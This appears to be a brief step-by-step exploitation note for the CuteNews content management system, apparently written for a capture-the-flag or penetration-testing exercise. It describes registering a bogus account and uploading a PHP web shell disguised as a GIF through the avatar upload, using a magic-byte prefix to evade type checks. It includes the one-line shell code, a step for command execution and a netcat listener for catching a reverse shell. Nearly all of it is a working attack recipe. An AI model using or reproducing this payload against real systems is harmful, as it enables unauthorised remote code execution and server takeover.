Cute News
Last updated
Last updated
[1]Navigate to default page and register new user
[2]Register bogus E-mail, user and password
[3]If captcha required for registration is malformed or does not show up, find it at .../captcha.php default page
[4]Once logged in, click on personal options and find the “avatar” tab
[5]Craft a malicious php script “evil.php” | using a magic byte will trick the system into interpreting ascii as a .gif file
GIF8;
<?php system($_REQUEST['cmd']) ?>
[6] Upload malicious file ,checkout folder where the malicious code was uploaded
Default location
[7] Get command execution
[8]Revshell
(might need to URL encode)
Catch revshell nc -nvlp 1234